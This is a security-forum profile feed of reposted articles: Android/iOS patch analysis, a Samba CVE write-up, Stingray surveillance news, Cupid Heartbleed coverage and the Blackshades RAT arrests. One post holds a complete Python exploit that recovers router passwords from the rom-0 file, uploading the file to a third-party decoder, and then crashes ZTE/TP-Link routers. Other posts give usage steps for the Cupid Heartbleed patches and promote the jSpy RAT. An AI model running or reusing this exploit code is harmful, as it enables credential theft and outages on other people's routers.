Jump to content

thehat

Members
 View Profile  See their activity

  • Posts

    47

  • Joined

  • Last visited

  • Days Won

    2

thehat last won the day on March 20 2013

thehat had the most liked content!

About thehat

  • Birthday 10/24/1982

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

thehat's Achievements

Newbie

Newbie (1/14)

50

Reputation

  1. thehat
    Reflecting on Recent iOS and Android Security Updates By zLabs Friday, Feb 12 2016 at 04:00 By: Zuk Avraham, Joshua Drake, Nikias Bassen from ZimperiumzLabs The last thirty days proven to be yet another exciting time for the mobile security ecosystem. Apple and Google released updates for their respective mobile operating systems that fix several critical issues — including some in the kernel that may be exploited remotely. Last Monday, Google released its monthly Nexus security bulletin. We are thrilled to see that the tradition that started after Stagefright’s discovery is a monthly routine now and other vendors are following suit (including Samsung). Blackberry indicated that they are very serious about security issues as well. We welcome Android vendors to reply to the ZHA thread to update the carriers on their plans to release an update addressing the February fixes by Google. We’ll take a closer look at the bulletin and some of the issues fixed later in this post. iOS 9.2.1 In the recent iOS update (9.2.1 – published on January 19th), Apple patched what we initially classified as 7 critical, 3 high, and 2 moderate severity vulnerabilities. These include at least five remotely exploitable vulnerabilities (CVE-2016-1723 through CVE-2016-1727) and at least one critical local kernel vulnerability triggerable from userland with low privileges (CVE-2016-1719). CVE-2015-7995 also appears to be exposed remotely, but determining exploitability will require further investigation. The following graph and table summarize the mentioned issues. CVE Component Impact Severity CVE-2016-1717 DiskImage Kernel Code Execution High CVE-2016-1719 IOHIDFamily Kernel Code Execution Critical CVE-2016-1720 IOKit Kernel Code Execution High CVE-2016-1721 Kernel Kernel Code Execution High CVE-2015-7995 libxslt Remote Code Execution Critical CVE-2016-1722 syslogd Code Execution w/EOP High CVE-2016-1723, CVE-2016-1724, CVE-2016-1725, CVE-2016-1726, CVE-2016-1727 WebKit Remote Code Execution Critical CVE-2016-1728 WebKit CSS Privacy Leak Moderate CVE-2016-1730 WebSheet Privacy Leak Moderate Android The February Nexus Security Bulletin encompasses 10 security issues including 5 critical, 4 high, and 1 moderate severity vulnerabilities. This includes 2 remotely exploitable kernel code execution vulnerabilities (CVE-2016-0801, CVE-2016-0802) and 2 remotely exploitable vulnerabilities exposed through Android’s mediaserver (CVE-2016-0803 in Stagefright, CVE-2016-0804). You can see the bulletin in its entirety here, but the following graph and table summarize the disclosed issues. CVE Component Impact Severity CVE-2016-0801 CVE-2016-0802 Broadcom Wi-Fi Driver Remote Code Execution Critical CVE-2016-0803 CVE-2016-0804 Mediaserver Remote Code Execution Critical CVE-2016-0805 Qualcomm Performance Module Elevation of Privilege Critical CVE-2016-0806 Qualcomm Wi-Fi Driver Elevation of Privilege Critical CVE-2016-0807 Debugger Daemon Elevation of Privilege Critical CVE-2016-0808 Minikin Denial of Service High CVE-2016-0809 Wi-Fi Elevation of Privilege High CVE-2016-0810 Mediaserver Elevation of Privilege High CVE-2016-0811 libmediaplayerservice Information Disclosure High CVE-2016-0812 CVE-2016-0813 Setup Wizard Elevation of Privilege Moderate While privilege escalation issues can be used by local apps or by remote exploits, attackers still need to gain initial code execution on the device to exploit those. With SELinux being enforced more strictly, kernel vulnerabilities are becoming more important (see our 2016 predictions []). Fortunately for the attackers (and unfortunately for us), we suspect that several additional security bugs lurk within Android device specific drivers and kernels. Further, the value of information disclosure vulnerabilities should not be underestimated. For example, CVE-2016-0811 may help attackers defeat security mitigations such as ASLR by leaking address space layout details. Combining several less severe issues together in a chain allows attackers to accomplish full compromise reliably. We expect this practice to remain a trend for the foreseeable future. As promised, Google updated the advisory within 48 hours with links to the AOSP commits that fixed the issues. It’s Interesting that several issues correspond to commits first released to the public in January. Unfortunately, this form of partial disclosure tends to give attackers that monitor code pushes a head start — especially when targeting 3rd party Android devices. On the bright side, that means up-to-date Nexus users were protected for an extra month before the official public disclosure. Let’s take a closer look at the relevant code changes for each issue. Analyzing the bugs The Broadcom Wi-Fi Driver remote kernel code execution vulnerabilities are the most interesting bugs disclosed this month. Although Google did not link to any commits for these two vulnerabilities, the Linux kernel is released under the GNU Public License which requires that source code be made available publicly. Shortly after the release, Security Researcher Ralf Philipp-Weinmann what we believe to be the related commits. The changes most relevant to CVE-2016-0801 and CVE-2016-0802 follow. We performed a cursory analysis of CVE-2016-0802 (full diffhere) and determined that several new validations were added checking packet lengths. However, we were unable to confirm that any ill effects would result from using nefarious values for the now-validated parameters. CVE-2016-0801 tells a different — and quite scary — story. See the following commit details. As you can see, the committer himself declared these issuesexploitable buffer overflows straight away. Looking at the code sheds additional light on the subject. drivers/net/wireless/bcmdhd/wl_cfg80211.c [diff]: In both cases, validation is added to prevent copying more data than the size of the destination buffer. Further, both destination buffers are located on the kernel stack. Because the stack contains crucial items such as the return address and — in the case of the kernel — the thread_info structure, exploiting such overflows is thought to be much easier. The next logical question is if and how these areas of code can be reached by an attacker. The bulletin states, “These vulnerabilities can be triggered when the attacker and the victim are associated with the same network.” However, our quick analysis of the code suggests (unconfirmed) that it may be possible to trigger these vulnerabilities without being associated at all. The following code is responsible for initializing a table of handlers that is used when various events occur. ==== 9765 static void wl_init_event_handler(struct bcm_cfg80211 *cfg) … 9781 cfg->evt_handler[WLC_E_ACTION_FRAME_RX] = wl_notify_rx_mgmt_frame; 9782 cfg->evt_handler[WLC_E_PROBREQ_MSG] = wl_notify_rx_mgmt_frame; 9783 cfg->evt_handler[WLC_E_P2P_PROBREQ_MSG] = wl_notify_rx_mgmt_frame; … 9790 cfg->evt_handler[WLC_E_PFN_NET_FOUND] = wl_notify_pfn_status; ==== The first three presented entries correspond with the first change in the diff. The wl_notify_rx_mgmt_frame function callswl_validate_wps_ie, which contains the buffer overflow. (and also has other callers that have not been investigated). The event IDs (the part in brackets) include probe requests and action frames. This is quite interesting because probe requests are one of the very first packets sent during association. If an Android device enabled the portable hotspot feature, this vulnerability could potentially be exposed to everyone within range of the Wi-Fi radio. The final presented event handler entry deals with scheduled scans. The wl_notify_pfn_status function callswl_notify_sched_scan_results, which contains the buffer overflow. Although we are still investigating, this functionality also sounds a lot like it could expose the vulnerability to any attacker within Wi-Fi range of a vulnerable device. After the Broadcom Wi-Fi driver, the next most interesting vulnerabilities in the bulletin relate to a subject near and dear to our hearts — Android’s media processing. CVE-2016-0803 fixes two integer overflows in libstagefright that were classified as critical RCE. The bugs existed within the SOFTMPEG4Encoder and functions. In both cases, the issue is an integer overflow occurring when dealing with multiplication involving the mWidth and mHeight parameters. This overflow was patched with two commits [] [2] that add a sanitization check prior to allocating 1.5 x mWidth x mHeight bytes in the process’ heap. The relevant changes follow. CVE-2016-0803 affect devices running: Android 4.4.4, 5.0, 5.1.1, 6.0 and 6.0.1 This issue is not without caveats, however. Since it exists within a codec, the victim would need to play back a malicious media file for an attacker trigger the vulnerability. While not all possible ways of accessing media have been investigated, Google Chrome on Android blocks automatic playback of HTML5 video by default (see here). As with most things Android, your mileage may vary depending on the specific device or application dealing with rich media. We encourage developers (especially those working on devices and browsers) to investigate and reconsider the decision to enable auto-play functionality. Another quirk with this vulnerability is that it appears to live within encoder functionality. It’s not presently clear how an attacker would exercise an encoder remotely, but we can’t rule it out either. The other critical RCE, vulnerability in mediaserver that is not related to libstagefright is CVE-2016-0804. It affects devices running Android 5.0, 5.1.1, 6.0 and 6.0.1. It was fixed by re-initializing the mDrmManagerClient member variable to NULL when cleaning up withinNuPlayer::GenericSource::notifyPreparedAndCleanup as shown below. frameworks/av / media/libmediaplayerservice/nuplayer/GenericSource.cpp Fixes of this nature often prevent using stale data later in the lifetime of the process. One of the security researchers on the team of people that reported the issue that this issue was a use-after-free problem triggered when processing a DRM-protected media file. Presumably the attack vector here is media within the browser. It’s not clear if playback is required here, but given the name of the vulnerable function it’s probably not. Conclusions To summarize, both iOS and Android are improving their security from month to month but both OSes still expose users to remotely exploitable bugs. It wouldn’t come as a surprise if more such vulnerabilities were discovered already or in the future. From a preliminary analysis of the bugs, the security of most available devices not running the latest version is alarming. Determined attackers such as professional malware authors and nation states couldn’t be happier with smartphones’ lack of updates and the amount of remotely exploitable vulnerabilities. Sursa: https://blog.zimperium.com/reflecting-on-recent-ios-and-android-security-updates/
  2. thehat
    Samba Remote Code Execution Vulnerability – CVE-2015-0240 The Samba team reported CVE-2015-0240 last February 23, 2015. This vulnerability is very difficult to exploit and we are not aware of successful exploitation. However, it is quite interesting from the point for view of detection. There are two important facts: The vulnerability resides in the Netlogon Remote Protocol implementation of Samba which is a very high-level application protocol that can be used over different transports configurations. To execute the vulnerable code the attacker doesn’t need be authenticated and can use many ways to launch the attacks because of the previous point. This is very motivating for attackers as they can find ways to bypass Intrusion Prevention System (IPS). There is a very good public description about the vulnerability, which can be found at this link. In this post, we will discuss it from the point of view of involved protocols and possible attack surfaces. Vulnerability description The vulnerability resides in the Netlogon Remote Protocol implementation of Samba, specifically in the method NetrServerPasswordSet. The Netlogon Remote Protocol was implemented for interoperability with Microsoft Windows environments and for simulating Primary Domain Controllers. Using the Netlogon Remote Protocol Windows and Linux machines can be part of the Samba PDC domain even without the use of Active Directory. The method NetrServerPasswordSet is used to change the machine account password in a Samba domain. The method NetrServerPasswordSet is implemented in _netr_ServerPasswordSet() in the source file samba\source3\rpc_server\netlogon\srv_netlog_nt.c. The “creds” pointer is passed into netr_creds_server_step_check() without initialization. The following figure shows the vulnerable code section: Figure 1. Vulnerable code section The triggering conditions can be different for Samba v3 and Samba v4 as pointed in this analysis. The attacker can control “computer_name” and “credentials” to reach the vulnerable code section making this vulnerability as possibly exploitable. There is a public POC triggering the vulnerable code. Running this POC and doing dynamic analysis shows that effectively the method _netr_ServerPasswordSet is called. The following figure shows the resumed call graph of Samba. Figure 2. Call graph of Samba Running Samba with high level debugging can allow us to get more runtime information. Example of a command: smbd –D –S /etc/samba/smb.conf -d 10 The following figure shows a section of the resulting log after running the POC. After some more lines we got: This error message is logged by the function schannel_fetch_session_key_tdb and returns the error with NT_STATUS_OBJECT_NAME_NOT_FOUND. This function is called by shannel_check_creds_state. Figure 4. The error NT_STATUS_OBJECT_NAME_NOT_FOUND The error NT_STATUS_OBJECT_NAME_NOT_FOUND will force _netr_ServerPasswordSet to free the “creds” pointer. Looking at the network packets in the following figure we can see the Netlogon Protocol using the transport RPC over SMB. Figure 5. Netlogon Protocol using the transport RPC over SMB And this is one important point regarding to the attack detection. The Netlogon protocol is a high-level application protocol and can use two transport types: RPC over SMB and RPC over TCP/IP. The next section discusses more about this topic. Attack Delivery Mechanisms The Netlogon Remote Protocol is a very high level application protocol that can run on different protocol stack configurations. The following figure shows it. Figure 6. Netlogon Protocol runs on different protocol stack configurations Figure 6 shows that theoretically, an attacker can use two stack configurations to reach the vulnerable code. They are: RPC over TCP/IP and RPC over SMB. These two configurations will use different network ports and communication mechanisms. This is a panacea for implementing attacks bypassing IPS. But even more interesting is the case over SMB where the NetrServerPasswordSet can be called using several SMB commands and at the same time the parameters to the method can be encrypted and unencrypted. The following figure shows other ways to call NetrServerPasswordSet. Figure 7. Other ways to call NetrServerPasswordSet Conclusion The vulnerability it is not easy to exploit and we are not aware of public exploits until now. However, the attack can be implemented in many different ways and the fact that it is not required to be authenticated makes it easy for the attackers. Implementing the protection requires coverage of multiple protocol stack configurations and multi commands over SMB. Sursa: Samba Remote Code Execution Vulnerability – CVE-2015-0240
  3. thehat
    De ce crezi ca echipamentele respective nu pot trece / au trecut oceanul ?
  4. thehat
    Not Just the NSA, Even the Local Cops Are Tracking You Across the whole of America, you are continuously being monitored by local police forces using a secretive technology without any warrant, while you are completely oblivious to this and thinking that it’s just the NSA, according to media reports. Local police are supported and encouraged by the government through latest technology assistance to vacuum up massive cellphone data, and the government is doing all it possibly could do to keep it under wraps, according to English daily The Guardian. “The Obama administration has been quietly advising local police not to disclose details about surveillance technology they are using to sweep up basic cellphone data from entire neighborhoods,” said The Associated Press. Stingrays, cell site simulators or International Mobile Subscriber Identity catchers, have been utilized by the government to conduct surveillance indiscriminately. These devices act as fake cellphone towers and can be easily mounted on a mobile police truck. They can be instructed to force all cellphones within their range to connect to them and divulge identifying information, which makes the tracking an easy game for the cops even when you are not making a call. The device is strong enough to penetrate the walls of homes and offices and collect information about the locations, phone’s identities, electronic serial numbers, directions and strength of phone’s signal as well as phone’s communications, i.e., the phone numbers they call to. Learn how Stingray works. And when the local cops do not have Stingrays for some reasons, they collect the information from cellphone service providers. These technologies are not cheap and in cases when the government fails to provide them with the devices, it is the Defense Department and Homeland Security that grants them with USD 400,000 to purchase it from contractors like Harris Corporation that makes the Stingray brand. This invasive surveillance has already been at odds with the civil liberties crowd and now several news agencies have revealed how the Obama administration is trying hard to keep its latest tool for mass surveillance a secret. “These extreme secrecy efforts are in relation to very controversial, local government surveillance practices using highly invasive technology. If public participation means anything, people should have the facts about what the government is doing to them,” said Nathan Freed Wessler, a staff attorney with the American Civil Liberties Union (ACLU). The tactics used by the government to keep Stingray away from journalists and public is sometimes very disturbing, noted the ACLU staff attorney. In one particular incident, the ACLU was initially promised the information on Stingrays, but when the staff went down to the police station to collect it, they were informed that the US Marshals had hidden it elsewhere. However, there is a silver lining; metadata tracking and mass collection of data may be forced to change. Recently, ACLU won a historic victory in the 11th Circuit Court of Appeals (serving Florida, Albama and Georgia. The court ruled that police requires a warrant from a judge before it proceeds with extraction of data from your cell through a cell tower. Sursa: Not Just the NSA, Even the Local Cops Are Tracking You | Hack Read
  5. thehat
    ZTE and TP-Link RomPager DoS Introduction I think by now you know the security issues disclosed related to TP-Link routers. I’ve noticed that some ZTE and TP-Link routers have the same firmware which is “FwVer:3.11.2.175_TC3086 HwVer:T14.F7_5.0”. I was curious to test the web application and I found out that the embedded server which is “RomPager” cannot handle fairly large POST requests. Tested Routers: ZTE ZXV10 W300 TP-Link TD-W8901G TP-Link TD-W8101G TP-Link TD-8840G TP-Link TD-8817 Vulnerability Information The /Forms/tools_test_1 page uses a POST request to send the IP address to ping. We can take advantage of this page for our exploit. You may find other places as well, but this place is quite good for developing an exploit. But instead of the actual IP address if we send a large buffer the server crashes and the router restarts. Of course we can do this remotely but still the router uses HTTP Basic authentication to access it’s resources. It means we need to know the router’s password rather than the default password ‘admin’. How can we achieve this? It’s simple as you all know that there is a rom-0 router backup file disclosure without any authentication we can decrypt the password and send our malicious POST requests and crash the router. Proof of Concept I’ve developed an automated exploit for this. The usage is ./dos.py -i [internal or external IP] #!/usr/bin/env python # -*- coding: utf-8 -*- # Exploit Title: ZTE and TP-Link RomPager DoS Exploit # Date: 10-05-2014 # Server Version: RomPager/4.07 UPnP/1.0 # Tested Routers: ZTE ZXV10 W300 # TP-Link TD-W8901G # TP-Link TD-W8101G # TP-Link TD-8840G # Firmware: FwVer:3.11.2.175_TC3086 HwVer:T14.F7_5.0 # Tested on: Kali Linux x86 # # Notes: Please note this exploit may contain errors, and # is provided "as it is". There is no guarantee # that it will work on your target router(s), as # the code may have to be adapted. # This is to avoid script kiddie abuse as well. # # Disclaimer: This proof of concept is strictly for research, educational or ethical (legal) purposes only. # Author takes no responsibility for any kind of damage you cause. # # Exploit Author: Osanda Malith Jayathissa (@OsandaMalith) # Dedicate to Nick Knight and Hood3dRob1n # # ./dos.py -i 192.168.1.1 import os import re import sys import time import urllib import base64 import httplib import urllib2 import requests import optparse import telnetlib import subprocess import collections import unicodedata class BitReader: def __init__(self, bytes): self._bits = collections.deque() for byte in bytes: byte = ord(byte) for n in xrange(8): self._bits.append(bool((byte >> (7-n)) & 1)) def getBit(self): return self._bits.popleft() def getBits(self, num): res = 0 for i in xrange(num): res += self.getBit() << num-1-i return res def getByte(self): return self.getBits(8) def __len__(self): return len(self._bits) class RingList: def __init__(self, length): self.__data__ = collections.deque() self.__full__ = False self.__max__ = length def append(self, x): if self.__full__: self.__data__.popleft() self.__data__.append(x) if self.size() == self.__max__: self.__full__ = True def get(self): return self.__data__ def size(self): return len(self.__data__) def maxsize(self): return self.__max__ def __getitem__(self, n): if n >= self.size(): return None return self.__data__[n] def filter_non_printable(str): return ''.join([c for c in str if ord(c) > 31 or ord(c) == 9]) def banner(): return ''' _/_/_/ _/_/_/ _/ _/ _/_/ _/ _/ _/ _/ _/ _/_/ _/ _/ _/ _/ _/ _/_/_/ _/_/ _/_/_/ ''' def dos(host, password): while (1): url = 'http://' +host+ '/Forms/tools_test_1' parameters = { 'Test_PVC' : 'PVC0', 'PingIPAddr' : '\101'*2000, 'pingflag' : '1', 'trace_open_flag' : '0', 'InfoDisplay' : '+-+Info+-%0D%0A' } params = urllib.urlencode(parameters) req = urllib2.Request(url, params) base64string = base64.encodestring('%s:%s' % ('admin', password)).replace('\n', '') req.add_header("Authorization", "Basic %s" %base64string) req.add_header("Content-type", "application/x-www-form-urlencoded") req.add_header("Referer", "http://" +host+ "/maintenance/tools_test.htm") try: print '[~] Sending Payload' response = urllib2.urlopen(req, timeout=1) sys.exit(0) except: flag = checkHost(host) if flag == 0: print '[+] The host is still up and running' else: print '[~] Success! The host is down' sys.exit(0) break def checkHost(host): if sys.platform == 'win32': c = "ping -n 2 " + host else: c = "ping -c 2 " + host try: x = subprocess.check_call(c, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) time.sleep(1) return x except: pass def checkServer(host): connexion = httplib.HTTPConnection(host) connexion.request("GET", "/status.html") response = connexion.getresponse() server = response.getheader("server") connexion.close() time.sleep(2) if server == 'RomPager/4.07 UPnP/1.0': return 0 else: return 1 def checkPassword(host): print '[+] Checking for default password' defaultpass = 'admin' tn = telnetlib.Telnet(host, 23, 4) tn.read_until("Password: ") tn.write(defaultpass + '\n') time.sleep(2) banner = tn.read_eager() banner = regex(len(defaultpass)*r'.'+'\w+' , banner) tn.write("exit\n") tn.close() time.sleep(4) if banner == 'Copyright': print '[+] Default password is being used' dos(host, defaultpass) else: print '[!] Default Password is not being used' while True: msg = str(raw_input('[?] Decrypt the rom-0 file locally? ')).lower() try: if msg[0] == 'y': password = decodePasswordLocal(host) print '[*] Router password is: ' +password dos(host, password) break if msg[0] == 'n': password = decodePasswordRemote(host) print '[*] Router password is: ' +password dos(host, password) break else: print '[!] Enter a valid choice' except Exception, e: print e continue def decodePasswordRemote(host): fname = 'rom-0' if os.path.isfile(fname) == True: os.remove(fname) urllib.urlretrieve ("http://"+host+"/rom-0", fname) # If this URL goes down you might have to find one and change this function. # You can also use the local decoder. It might have few errors in getting output. url = 'http://198.61.167.113/zynos/decoded.php' # Target URL files = {'uploadedfile': open('rom-0', 'rb') } # The rom-0 file we wanna upload data = {'MAX_FILE_SIZE': 1000000, 'submit': 'Upload rom-0'} # Additional Parameters we need to include headers = { 'User-agent' : 'Python Demo Agent v1' } # Any additional Headers you want to send or include res = requests.post(url, files=files, data=data, headers=headers, allow_redirects=True, timeout=30.0, verify=False ) res1 =res.content p = re.search('rows=10>(.*)', res1) if p: passwd = found = p.group(1) else: password = 'NotFound' return passwd def decodePasswordLocal(host): # Sometimes this might output a wrong password while finding the exact string. # print the result as mentioned below and manually find out fname = 'rom-0' if os.path.isfile(fname) == True: os.remove(fname) urllib.urlretrieve ("http://"+host+"/rom-0", fname) fpos=8568 fend=8788 fhandle=file('rom-0') fhandle.seek(fpos) chunk="*" amount=221 while fpos < fend: if fend-fpos < amount: amount = amount data = fhandle.read(amount) fpos += len(data) reader = BitReader(data) result = '' window = RingList(2048) while True: bit = reader.getBit() if not bit: char = reader.getByte() result += chr(char) window.append(char) else: bit = reader.getBit() if bit: offset = reader.getBits(7) if offset == 0: break else: offset = reader.getBits(11) lenField = reader.getBits(2) if lenField < 3: lenght = lenField + 2 else: lenField <<= 2 lenField += reader.getBits(2) if lenField < 15: lenght = (lenField & 0x0f) + 5 else: lenCounter = 0 lenField = reader.getBits(4) while lenField == 15: lenField = reader.getBits(4) lenCounter += 1 lenght = 15*lenCounter + 8 + lenField for i in xrange(lenght): char = window[-offset] result += chr(char) window.append(char) result = filter_non_printable(result).decode('unicode_escape').encode('ascii','ignore') # In case the password you see is wrong while filtering, manually print it from here and findout. #print result if 'TP-LINK' in result: result = ''.join(result.split()).split('TP-LINK', 1)[0] + 'TP-LINK'; result = result.replace("TP-LINK", "") result = result[1:] if 'ZTE' in result: result = ''.join(result.split()).split('ZTE', 1)[0] + 'ZTE'; result = result.replace("ZTE", "") result = result[1:] if 'tc160' in result: result = ''.join(result.split()).split('tc160', 1)[0] + 'tc160'; result = result.replace("tc160", "") result = result[1:] return result def regex(path, text): match = re.search(path, text) if match: return match.group() else: return None def main(): if sys.platform == 'win32': os.system('cls') else: os.system('clear') try: print banner() print ''' [*] ZTE and TP-Link RomPager Denial of Service Exploit [*] Author: Osanda Malith Jayathissa [*] Follow @OsandaMalith [!] Disclaimer: This proof of concept is strictly for research, educational or ethical (legal) purposes only. [!] Author takes no responsibility for any kind of damage you cause. ''' parser = optparse.OptionParser("usage: %prog -i <IP Address> ") parser.add_option('-i', dest='host', type='string', help='Specify the IP to attack') (options, args) = parser.parse_args() if options.host is None: parser.print_help() exit(-1) host = options.host x = checkHost(host) if x == 0: print '[+] The host is up and running' server = checkServer(host) if server == 0: checkPassword(host) else: print ('[!] Sorry the router is not running RomPager') else: print '[!] The host is not up and running' sys.exit(0) except KeyboardInterrupt: print '[!] Ctrl + C detected\n[!] Exiting' sys.exit(0) except EOFError: print '[!] Ctrl + D detected\n[!] Exiting' sys.exit(0) if __name__ == "__main__": main() #EOF Prevention To prevent from this attack you can port forward port 80 to a unused IP of your network Sursa: ZTE and TP-Link RomPager DoS | Blog of Osanda Malith
  6. thehat
    ## Cupid 0.1 ## Author: Luis Grangeia ## lgrangeia@sysvalue.com ## twitter.com/lgrangeia # INTRODUCTION Cupid is a pair of patches for hostapd-2.1 and wpa_supplicant-2.1 to exploit heartbleed on Wireless networks that use EAP Authentication methods based on TLS (specifically OpenSSL) Please see presentation slides for a simple introduction to cupid: Luis Grangeia, Partner and security services manager at Sysvalue s.a. # COMPILATION Get wpa_supplicant-2.1 and/or hostapd-2.1, apply the respective patch and compile. I don't recommend doing a "make install" as you'll be replacing your systems binaries with non-functional copies (functional only for exploiting heartbleed). # USAGE Both patches come with a "heartbleed.conf" file that can be used to tweak behaviour. It must be present and placed on the same directory you're running the binary. Refer to the file for details. --> wpa_supplicant: Use the included test_wpasupplicant.conf and change the ssid to the network you're wanting to test heartbleed for. Fire up wireshark or tcpdump on the interface to check for TLS heartbeat requests/responses. I usually do: # airmon-ng start wlan0 and then monitor the whole thing on the mon0 interface (use filter 'EAP || SSL' for a better picture). fire up wpa_supplicant: ./wpa_supplicant -i wlan0 -dd -c ~/testconfs/test_wpasupplicant.conf Look at the output of wireshark to see if the network you're attacking is vulnerable. --> hostapd Use the included test_hostapd.conf. You may have to set up certificates and an empty eap_user file. I've included these for reference as well. Fire up wireshark as described above. Note that you need a wireless adapter supporting host AP mode. fire up hostapd: ./hostapd -d test_hostapd.conf Then try to connect to the "bleedingheart" network with your mobile device or laptop, and it will try to heartbleed it. You can put any login/password combination. To see if the patch works just install a vulnerable OpenSSL version and try to exploit your local copy of wpa_supplicant or a fresh install of hostapd. ### FUTURE WORK Please let me know if you find vulnerable devices and give me their version and if possible a packet dump of the actual attack. TODO: - Code is still very incomplete, just a PoC - Does not decrypt the heartbeat response if encrypted (not the case if pre-handshake) - Should output the heartbeat responses to a file - Test more devices/networks! Sursa: https://github.com/lgrangeia/cupid
  7. thehat
    Meet “Cupid,” the Heartbleed attack that spawns “evil” Wi-Fi networks Open source code also attacks devices connecting to wireless networks. It just got easier to exploit the catastrophic Heartbleed vulnerability against wireless networks and the devices that connect to them thanks to the release last week of open source code that streamlines the process of plucking passwords, e-mail addresses, and other sensitive information from vulnerable routers and connected clients. Dubbed Cupid, the code comes in the form of two software extensions. The first gives wireless networks the ability to deploy "evil networks" that surreptitiously send malicious packets to connected devices. Client devices relying on vulnerable versions of the OpenSSL cryptography library can then be forced to transmit contents stored in memory. The second extension runs on client devices. When connecting to certain types of wireless networks popular in corporations and other large organizations, the devices send attack packets that similarly pilfer data from vulnerable routers. The release of Cupid comes eight weeks after the disclosure of Heartbleed, one of the most serious vulnerabilities to ever hit the Internet. The flaw, which existed for more than two years in OpenSSL, resides in "heartbeat" functions designed to keep a transport layer security (TLS) connection alive over an extended period of time. Heartbleed is best known for giving end users the ability to pluck data out of vulnerable servers. But it turns out that the bug can be used to the same effect against virtually any device running an unpatched version of OpenSSL. Cupid streamlines the process of exploiting devices connecting over wireless networks that are secured using the extended authentication protocol (EAP), which many large organizations use to password-protect access. "This is basically the same attack as Heartbleed, based on a malicious heartbeat packet," Luis Grangeia, a partner and security services manager at SysValue and the creator of Cupid, wrote in a blog post published Friday. "Like the original attack, which happens on regular TLS connections over TCP, both clients and servers can be exploited and memory can be read off processes on both ends of the connection. The difference in this scenario is that the TLS connection is being made over EAP, which is an authentication framework/mechanism used in Wireless networks. It’s also used in other situations, including wired networks that use 802.1x Network Authentication and peer to peer connections." Grangeia said a client attacking a router doesn't need to have a valid password, although a valid username is sometimes required. That requirement isn't much of a hurdle, however, since usernames are transmitted unencrypted, making them easy for an attacker to sniff over the air. Malicious networks running Cupid need no user credentials to attack vulnerable clients. Among the clients that remain vulnerable are handsets running versions 4.1.0 and 4.1.1 of Google's Android mobile operating system. The researcher said he hasn't tested vulnerable routers to see exactly what kind of memory contents they will divulge in a Heartbleed attack. "Most of the memory is zeroed out, but cursory inspection found interesting stuff on both vulnerable clients and servers," he wrote. "I can speculate that most likely the private key of the certificate used on the TLS connection is in memory. What can also be in memory is the user credentials used for authenticating the connection." Most home networks are probably safe from Cupid since home and small office routers typically use Wi-Fi Protected Access without EAP for authentication. Wireless devices in corporations and other large organizations may be more susceptible, since EAP-capable routers often don't receive updates in a timely fashion. Any smartphone or other type of client is vulnerable if it's running wireless software that relies on an old version of OpenSSL. Sursa: Meet “Cupid,” the Heartbleed attack that spawns “evil” Wi-Fi networks | Ars Technica
  8. thehat
    The U.S. Justice Department today announced a series of actions against more than 100 people accused of purchasing and using “Blackshades,” a password-stealing Trojan horse program designed to infect computers throughout the world to spy on victims through their web cameras, steal files and account information, and log victims’ key strokes. While any effort that discourages the use of point-and-click tools for ill-gotten gains is a welcome development, the most remarkable aspect of this crackdown is that those who were targeted in this operation lacked any clue that it was forthcoming. To be sure, Blackshades is an effective and easy-to-use tool for remotely compromising and spying on your targets. Early on in its development, researchers at CitzenLab discovered that Blackshades was being used to spy on activists seeking to overthrow the regime in Syria. The product was sold via well-traveled and fairly open hacker forums, and even included an active user forum where customers could get help configuring and wielding the powerful surveillance tool. Although in recent years a license to Blackshades sold for several hundred Euros, early versions of the product were sold via PayPal for just USD $40. In short, Blackshades was a tool created and marketed principally for buyers who wouldn’t know how to hack their way out of a paper bag. From the Justice Department’s press release today: “After purchasing a copy of the RAT, a user had to install the RAT on a victim’s computer – i.e., “infect” a victim’s computer. The infection of a victim’s computer could be accomplished in several ways, including by tricking victims into clicking on malicious links or by hiring others to install the RAT on victims’ computers. The RAT contained tools known as ‘spreaders’ that helped users of the RAT maximize the number of infections. The spreader tools generally worked by using computers that had already been infected to help spread the RAT further to other computers. For instance, in order to lure additional victims to click on malicious links that would install the RAT on their computers, the RAT allowed cybercriminals to send those malicious links to others via the initial victim’s social media service, making it appear as if the message had come from the initial victim.” News that the FBI and other national law enforcement organizations had begun rounding up Blackshades customers started surfacing online last week, when multiple denizens of the noob-friendly hacker forum Hackforums[dot]net began posting firsthand experiences of receiving a visit from local authorities related to their prior alleged Blackshades use. See the image gallery at the end of this post for a glimpse into the angst that accompanied that development. While there is a certain amount of schadenfreude in today’s action, the truth is that any longtime Blackshades customer who didn’t know this day would be coming should turn in his hacker card immediately. In June 2012, the Justice Department announced a series of indictments against at least two dozen individuals who had taken the bait and signed up to be active members of “Carderprofit,” a fraud forum that was created and maintained by the Federal Bureau of Investigation. Among those arrested in the CarderProfit sting was Michael Hogue, the alleged co-creator of Blackshades. That so many of the customers of this product are teenagers who wouldn’t know a command line prompt from a hole in the ground is evident by the large number of users who vented their outrage over their arrests and/or visits by the local authorities on Hackforums, which by the way was the genesis of the CarderProfit sting from Day One. In June 2010, Hackforums administrator Jesse Labrocca — a.k.a. “Omniscient” — posted a message to all users of the forum, notifying them that the forum would no longer tolerate the posting of messages about ways to buy and use the ZeuS Trojan, a far more sophisticated remote-access Trojan that is heavily used by cybercriminals worldwide and has been implicated in the theft of hundreds of millions of dollars from small- to mid-sized businesses worldwide. Hackforums admin Jesse “Omniscient” LaBrocca urging users to register at a new forum — Carderprofit.cc — a sting Web site set up by the FBI. That warning, shown in the screen shot above, alerted Hackforums users that henceforth any discussion about using or buying ZeuS was verboten on the site, and that those who wished to carry on conversations about this topic should avail themselves of a brand new forum that was being set up to accommodate them. And, of course, that forum was carderprofit[dot]eu. Interestingly, a large number of the individuals rounded up as part of the FBI’s CardProfit sting included several key leaders of LulzSec (including the 16-year-old individual responsible for sending a heavily armed police response to my home in March 2013). The CarderProfit homepage, which featured an end-user license agreement written by the FBI. In a press conference today, the FBI said its investigation has shown that Blackshades was purchased by at least several thousand users in more than 100 countries and used to infect more than half a million computers worldwide. The government alleges that one co-creator of Blackshades generated sales of more than $350,000 between September 2010 and April 2014. Information about that individual and others charged in this case can be found at this link. For a glimpse at what the recipients of all this attention went through these past few days, check out the images below. Sursa ‘Blackshades’ Trojan Users Had It Coming — Krebs on Security
  9. thehat
    jSpy is a RAT developed in Java A free Java Remote Administration Tool jSpy will run on Windows, Mac OSX and Linux. jSpy was developed on a Mac ensuring that all features work on both UNIX and DOS Systems. jSpy uses a library called Kryonet developed by Esoterics Software. By using this library for networking, jSpy creates an environment where you can be rest assured you won't lose your clients. -Startup module for Linux Systems has not been implemented: Do not expect your linux clients to come back. Download: jSpy RAT - Developed in Java Pare interesant, l-a folosit cineva ? Sau altceva bazat pe Java ?
